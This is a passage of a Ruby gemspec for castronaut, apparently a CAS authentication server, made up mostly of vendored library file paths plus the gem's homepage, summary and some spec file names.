"vendor/activesupport/lib/active_support/multibyte/exceptions.rb",
"vendor/activesupport/lib/active_support/multibyte/unicode_database.rb",
"vendor/activesupport/lib/active_support/option_merger.rb",
"vendor/activesupport/lib/active_support/ordered_hash.rb",
"vendor/activesupport/lib/active_support/ordered_options.rb",
"vendor/activesupport/lib/active_support/rescuable.rb",
"vendor/activesupport/lib/active_support/secure_random.rb",
"vendor/activesupport/lib/active_support/string_inquirer.rb",
"vendor/activesupport/lib/active_support/test_case.rb",
"vendor/activesupport/lib/active_support/testing/core_ext/test.rb",
"vendor/activesupport/lib/active_support/testing/core_ext/test/unit/assertions.rb",
"vendor/activesupport/lib/active_support/testing/default.rb",
"vendor/activesupport/lib/active_support/testing/performance.rb",
"vendor/activesupport/lib/active_support/testing/setup_and_teardown.rb",
"vendor/activesupport/lib/active_support/time_with_zone.rb",
"vendor/activesupport/lib/active_support/values/time_zone.rb",
"vendor/activesupport/lib/active_support/values/unicode_tables.dat",
"vendor/activesupport/lib/active_support/vendor.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/blankslate.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/blankslate.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/css.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xchar.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xmlbase.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xmlevents.rb",
"vendor/activesupport/lib/active_support/vendor/builder-2.1.2/builder/xmlmarkup.rb",
"vendor/activesupport/lib/active_support/vendor/i18n-0.0.1/i18n.rb",
"vendor/activesupport/lib/active_support/vendor/i18n-0.0.1/i18n/backend/simple.rb",
"vendor/activesupport/lib/active_support/vendor/i18n-0.0.1/i18n/exceptions.rb",
"vendor/activesupport/lib/active_support/vendor/memcache-client-1.5.1/memcache.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/data_timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/data_timezone_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Algiers.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Cairo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Casablanca.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Harare.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Johannesburg.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Monrovia.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Africa/Nairobi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Argentina/Buenos_Aires.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Argentina/San_Juan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Bogota.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Caracas.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Chicago.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Chihuahua.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Denver.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Godthab.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Guatemala.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Halifax.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Indiana/Indianapolis.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Juneau.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/La_Paz.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Lima.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Los_Angeles.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Mazatlan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Mexico_City.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Monterrey.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/New_York.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Phoenix.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Regina.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Santiago.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Sao_Paulo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/St_Johns.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/America/Tijuana.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Almaty.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Baghdad.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Baku.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Bangkok.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Chongqing.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Colombo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Dhaka.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Hong_Kong.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Irkutsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Jakarta.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Jerusalem.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kabul.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kamchatka.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Karachi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Katmandu.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kolkata.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Krasnoyarsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kuala_Lumpur.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Kuwait.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Magadan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Muscat.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Novosibirsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Rangoon.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Riyadh.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Seoul.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Shanghai.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Singapore.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Taipei.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tashkent.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tbilisi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tehran.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Tokyo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Ulaanbaatar.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Urumqi.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Vladivostok.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Yakutsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Yekaterinburg.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Asia/Yerevan.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Atlantic/Azores.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Atlantic/Cape_Verde.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Atlantic/South_Georgia.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Adelaide.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Brisbane.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Darwin.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Hobart.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Melbourne.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Perth.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Australia/Sydney.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Etc/UTC.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Amsterdam.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Athens.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Belgrade.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Berlin.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Bratislava.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Brussels.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Bucharest.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Budapest.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Copenhagen.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Dublin.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Helsinki.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Istanbul.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Kiev.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Lisbon.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Ljubljana.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/London.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Madrid.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Minsk.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Moscow.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Paris.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Prague.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Riga.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Rome.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Sarajevo.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Skopje.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Sofia.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Stockholm.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Tallinn.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Vienna.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Vilnius.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Warsaw.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Europe/Zagreb.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Auckland.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Fiji.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Guam.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Honolulu.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Majuro.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Midway.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Noumea.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Pago_Pago.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Port_Moresby.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/definitions/Pacific/Tongatapu.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/info_timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/linked_timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/linked_timezone_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/offset_rationals.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/ruby_core_support.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/time_or_datetime.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_definition.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_offset_info.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_period.rb",
"vendor/activesupport/lib/active_support/vendor/tzinfo-0.3.12/tzinfo/timezone_transition_info.rb",
"vendor/activesupport/lib/active_support/vendor/xml-simple-1.0.11/xmlsimple.rb",
"vendor/activesupport/lib/active_support/version.rb",
"vendor/activesupport/lib/active_support/whiny_nil.rb",
"vendor/activesupport/lib/activesupport.rb",
"vendor/isaac/LICENSE",
"vendor/isaac/README",
"vendor/isaac/TODO",
"vendor/isaac/VERSIONS",
"vendor/isaac/crypt/ISAAC.rb",
"vendor/isaac/isaac.gemspec",
"vendor/isaac/setup.rb",
"vendor/isaac/test/TC_ISAAC.rb",
"vendor/json/CHANGES",
"vendor/json/GPL",
"vendor/json/README",
"vendor/json/RUBY",
"vendor/json/Rakefile",
"vendor/json/TODO",
"vendor/json/VERSION",
"vendor/json/benchmarks/benchmark.txt",
"vendor/json/benchmarks/benchmark_generator.rb",
"vendor/json/benchmarks/benchmark_parser.rb",
"vendor/json/benchmarks/benchmark_rails.rb",
"vendor/json/bin/edit_json.rb",
"vendor/json/bin/prettify_json.rb",
"vendor/json/data/example.json",
"vendor/json/data/index.html",
"vendor/json/data/prototype.js",
"vendor/json/ext/json/ext/generator/extconf.rb",
"vendor/json/ext/json/ext/generator/generator.c",
"vendor/json/ext/json/ext/generator/unicode.c",
"vendor/json/ext/json/ext/generator/unicode.h",
"vendor/json/ext/json/ext/parser/extconf.rb",
"vendor/json/ext/json/ext/parser/parser.c",
"vendor/json/ext/json/ext/parser/parser.rl",
"vendor/json/ext/json/ext/parser/unicode.c",
"vendor/json/ext/json/ext/parser/unicode.h",
"vendor/json/install.rb",
"vendor/json/lib/json.rb",
"vendor/json/lib/json/Array.xpm",
"vendor/json/lib/json/FalseClass.xpm",
"vendor/json/lib/json/Hash.xpm",
"vendor/json/lib/json/Key.xpm",
"vendor/json/lib/json/NilClass.xpm",
"vendor/json/lib/json/Numeric.xpm",
"vendor/json/lib/json/String.xpm",
"vendor/json/lib/json/TrueClass.xpm",
"vendor/json/lib/json/add/core.rb",
"vendor/json/lib/json/add/rails.rb",
"vendor/json/lib/json/common.rb",
"vendor/json/lib/json/editor.rb",
"vendor/json/lib/json/ext.rb",
"vendor/json/lib/json/json.xpm",
"vendor/json/lib/json/pure.rb",
"vendor/json/lib/json/pure/generator.rb",
"vendor/json/lib/json/pure/parser.rb",
"vendor/json/lib/json/version.rb",
"vendor/json/tests/fixtures/fail1.json",
"vendor/json/tests/fixtures/fail10.json",
"vendor/json/tests/fixtures/fail11.json",
"vendor/json/tests/fixtures/fail12.json",
"vendor/json/tests/fixtures/fail13.json",
"vendor/json/tests/fixtures/fail14.json",
"vendor/json/tests/fixtures/fail18.json",
"vendor/json/tests/fixtures/fail19.json",
"vendor/json/tests/fixtures/fail2.json",
"vendor/json/tests/fixtures/fail20.json",
"vendor/json/tests/fixtures/fail21.json",
"vendor/json/tests/fixtures/fail22.json",
"vendor/json/tests/fixtures/fail23.json",
"vendor/json/tests/fixtures/fail24.json",
"vendor/json/tests/fixtures/fail25.json",
"vendor/json/tests/fixtures/fail27.json",
"vendor/json/tests/fixtures/fail28.json",
"vendor/json/tests/fixtures/fail3.json",
"vendor/json/tests/fixtures/fail4.json",
"vendor/json/tests/fixtures/fail5.json",
"vendor/json/tests/fixtures/fail6.json",
"vendor/json/tests/fixtures/fail7.json",
"vendor/json/tests/fixtures/fail8.json",
"vendor/json/tests/fixtures/fail9.json",
"vendor/json/tests/fixtures/pass1.json",
"vendor/json/tests/fixtures/pass15.json",
"vendor/json/tests/fixtures/pass16.json",
"vendor/json/tests/fixtures/pass17.json",
"vendor/json/tests/fixtures/pass2.json",
"vendor/json/tests/fixtures/pass26.json",
"vendor/json/tests/fixtures/pass3.json",
"vendor/json/tests/runner.rb",
"vendor/json/tests/test_json.rb",
"vendor/json/tests/test_json_addition.rb",
"vendor/json/tests/test_json_fixtures.rb",
"vendor/json/tests/test_json_generate.rb",
"vendor/json/tests/test_json_rails.rb",
"vendor/json/tests/test_json_unicode.rb",
"vendor/json/tools/fuzz.rb",
"vendor/json/tools/server.rb",
"vendor/rack/AUTHORS",
"vendor/rack/COPYING",
"vendor/rack/KNOWN-ISSUES",
"vendor/rack/RDOX",
"vendor/rack/README",
"vendor/rack/Rakefile",
"vendor/rack/SPEC",
"vendor/rack/bin/rackup",
"vendor/rack/contrib/rack_logo.svg",
"vendor/rack/example/lobster.ru",
"vendor/rack/example/protectedlobster.rb",
"vendor/rack/example/protectedlobster.ru",
"vendor/rack/lib/rack.rb",
"vendor/rack/lib/rack/adapter/camping.rb",
"vendor/rack/lib/rack/auth/abstract/handler.rb",
"vendor/rack/lib/rack/auth/abstract/request.rb",
"vendor/rack/lib/rack/auth/basic.rb",
"vendor/rack/lib/rack/auth/digest/md5.rb",
"vendor/rack/lib/rack/auth/digest/nonce.rb",
"vendor/rack/lib/rack/auth/digest/params.rb",
"vendor/rack/lib/rack/auth/digest/request.rb",
"vendor/rack/lib/rack/auth/openid.rb",
"vendor/rack/lib/rack/builder.rb",
"vendor/rack/lib/rack/cascade.rb",
"vendor/rack/lib/rack/commonlogger.rb",
"vendor/rack/lib/rack/conditionalget.rb",
"vendor/rack/lib/rack/content_length.rb",
"vendor/rack/lib/rack/deflater.rb",
"vendor/rack/lib/rack/directory.rb",
"vendor/rack/lib/rack/file.rb",
"vendor/rack/lib/rack/handler.rb",
"vendor/rack/lib/rack/handler/cgi.rb",
"vendor/rack/lib/rack/handler/evented_mongrel.rb",
"vendor/rack/lib/rack/handler/fastcgi.rb",
"vendor/rack/lib/rack/handler/lsws.rb",
"vendor/rack/lib/rack/handler/mongrel.rb",
"vendor/rack/lib/rack/handler/scgi.rb",
"vendor/rack/lib/rack/handler/swiftiplied_mongrel.rb",
"vendor/rack/lib/rack/handler/thin.rb",
"vendor/rack/lib/rack/handler/webrick.rb",
"vendor/rack/lib/rack/head.rb",
"vendor/rack/lib/rack/lint.rb",
"vendor/rack/lib/rack/lobster.rb",
"vendor/rack/lib/rack/methodoverride.rb",
"vendor/rack/lib/rack/mime.rb",
"vendor/rack/lib/rack/mock.rb",
"vendor/rack/lib/rack/recursive.rb",
"vendor/rack/lib/rack/reloader.rb",
"vendor/rack/lib/rack/request.rb",
"vendor/rack/lib/rack/response.rb",
"vendor/rack/lib/rack/session/abstract/id.rb",
"vendor/rack/lib/rack/session/cookie.rb",
"vendor/rack/lib/rack/session/memcache.rb",
"vendor/rack/lib/rack/session/pool.rb",
"vendor/rack/lib/rack/showexceptions.rb",
"vendor/rack/lib/rack/showstatus.rb",
"vendor/rack/lib/rack/static.rb",
"vendor/rack/lib/rack/urlmap.rb",
"vendor/rack/lib/rack/utils.rb",
"vendor/rack/test/cgi/lighttpd.conf",
"vendor/rack/test/cgi/test",
"vendor/rack/test/cgi/test.fcgi",
"vendor/rack/test/cgi/test.ru",
"vendor/rack/test/spec_rack_auth_basic.rb",
"vendor/rack/test/spec_rack_auth_digest.rb",
"vendor/rack/test/spec_rack_auth_openid.rb",
"vendor/rack/test/spec_rack_builder.rb",
"vendor/rack/test/spec_rack_camping.rb",
"vendor/rack/test/spec_rack_cascade.rb",
"vendor/rack/test/spec_rack_cgi.rb",
"vendor/rack/test/spec_rack_commonlogger.rb",
"vendor/rack/test/spec_rack_conditionalget.rb",
"vendor/rack/test/spec_rack_content_length.rb",
"vendor/rack/test/spec_rack_deflater.rb",
"vendor/rack/test/spec_rack_directory.rb",
"vendor/rack/test/spec_rack_fastcgi.rb",
"vendor/rack/test/spec_rack_file.rb",
"vendor/rack/test/spec_rack_handler.rb",
"vendor/rack/test/spec_rack_head.rb",
"vendor/rack/test/spec_rack_lint.rb",
"vendor/rack/test/spec_rack_lobster.rb",
"vendor/rack/test/spec_rack_methodoverride.rb",
"vendor/rack/test/spec_rack_mock.rb",
"vendor/rack/test/spec_rack_mongrel.rb",
"vendor/rack/test/spec_rack_recursive.rb",
"vendor/rack/test/spec_rack_request.rb",
"vendor/rack/test/spec_rack_response.rb",
"vendor/rack/test/spec_rack_session_cookie.rb",
"vendor/rack/test/spec_rack_session_memcache.rb",
"vendor/rack/test/spec_rack_session_pool.rb",
"vendor/rack/test/spec_rack_showexceptions.rb",
"vendor/rack/test/spec_rack_showstatus.rb",
"vendor/rack/test/spec_rack_static.rb",
"vendor/rack/test/spec_rack_thin.rb",
"vendor/rack/test/spec_rack_urlmap.rb",
"vendor/rack/test/spec_rack_utils.rb",
"vendor/rack/test/spec_rack_webrick.rb",
"vendor/rack/test/testrequest.rb",
"vendor/sinatra/AUTHORS",
"vendor/sinatra/CHANGES",
"vendor/sinatra/LICENSE",
"vendor/sinatra/README.rdoc",
"vendor/sinatra/Rakefile",
"vendor/sinatra/compat/app_test.rb",
"vendor/sinatra/compat/application_test.rb",
"vendor/sinatra/compat/builder_test.rb",
"vendor/sinatra/compat/custom_error_test.rb",
"vendor/sinatra/compat/erb_test.rb",
"vendor/sinatra/compat/events_test.rb",
"vendor/sinatra/compat/filter_test.rb",
"vendor/sinatra/compat/haml_test.rb",
"vendor/sinatra/compat/helper.rb",
"vendor/sinatra/compat/mapped_error_test.rb",
"vendor/sinatra/compat/pipeline_test.rb",
"vendor/sinatra/compat/public/foo.xml",
"vendor/sinatra/compat/sass_test.rb",
"vendor/sinatra/compat/sessions_test.rb",
"vendor/sinatra/compat/streaming_test.rb",
"vendor/sinatra/compat/sym_params_test.rb",
"vendor/sinatra/compat/template_test.rb",
"vendor/sinatra/compat/use_in_file_templates_test.rb",
"vendor/sinatra/compat/views/foo.builder",
"vendor/sinatra/compat/views/foo.erb",
"vendor/sinatra/compat/views/foo.haml",
"vendor/sinatra/compat/views/foo.sass",
"vendor/sinatra/compat/views/foo_layout.erb",
"vendor/sinatra/compat/views/foo_layout.haml",
"vendor/sinatra/compat/views/layout_test/foo.builder",
"vendor/sinatra/compat/views/layout_test/foo.erb",
"vendor/sinatra/compat/views/layout_test/foo.haml",
"vendor/sinatra/compat/views/layout_test/foo.sass",
"vendor/sinatra/compat/views/layout_test/layout.builder",
"vendor/sinatra/compat/views/layout_test/layout.erb",
"vendor/sinatra/compat/views/layout_test/layout.haml",
"vendor/sinatra/compat/views/layout_test/layout.sass",
"vendor/sinatra/compat/views/no_layout/no_layout.builder",
"vendor/sinatra/compat/views/no_layout/no_layout.haml",
"vendor/sinatra/lib/sinatra.rb",
"vendor/sinatra/lib/sinatra/base.rb",
"vendor/sinatra/lib/sinatra/compat.rb",
"vendor/sinatra/lib/sinatra/images/404.png",
"vendor/sinatra/lib/sinatra/images/500.png",
"vendor/sinatra/lib/sinatra/main.rb",
"vendor/sinatra/lib/sinatra/test.rb",
"vendor/sinatra/lib/sinatra/test/bacon.rb",
"vendor/sinatra/lib/sinatra/test/rspec.rb",
"vendor/sinatra/lib/sinatra/test/spec.rb",
"vendor/sinatra/lib/sinatra/test/unit.rb",
"vendor/sinatra/sinatra.gemspec",
"vendor/sinatra/test/base_test.rb",
"vendor/sinatra/test/builder_test.rb",
"vendor/sinatra/test/data/reload_app_file.rb",
"vendor/sinatra/test/erb_test.rb",
"vendor/sinatra/test/filter_test.rb",
"vendor/sinatra/test/haml_test.rb",
"vendor/sinatra/test/helper.rb",
"vendor/sinatra/test/helpers_test.rb",
"vendor/sinatra/test/mapped_error_test.rb",
"vendor/sinatra/test/middleware_test.rb",
"vendor/sinatra/test/options_test.rb",
"vendor/sinatra/test/reload_test.rb",
"vendor/sinatra/test/request_test.rb",
"vendor/sinatra/test/result_test.rb",
"vendor/sinatra/test/routing_test.rb",
"vendor/sinatra/test/sass_test.rb",
"vendor/sinatra/test/sinatra_test.rb",
"vendor/sinatra/test/static_test.rb",
"vendor/sinatra/test/templates_test.rb",
"vendor/sinatra/test/views/hello.builder",
"vendor/sinatra/test/views/hello.erb",
"vendor/sinatra/test/views/hello.haml",
"vendor/sinatra/test/views/hello.sass",
"vendor/sinatra/test/views/hello.test",
"vendor/sinatra/test/views/layout2.builder",
"vendor/sinatra/test/views/layout2.erb",
"vendor/sinatra/test/views/layout2.haml",
"vendor/sinatra/test/views/layout2.test"
]
s.homepage = %q{http://github.com/relevance/castronaut}
s.require_paths = ["lib"]
s.rubygems_version = %q{1.3.2}
s.summary = %q{Your friendly, cigar smoking authentication dicator... From Space!}
s.test_files = [
"spec/app/controllers/application_spec.rb",
"spec/castronaut/adapters/development/adapter_spec.rb",
"spec/castronaut/adapters/development/user_spec.rb",
"spec/castronaut/adapters/ldap/adapter_spec.rb",
"spec/castronaut/adapters/ldap/user_spec.rb",
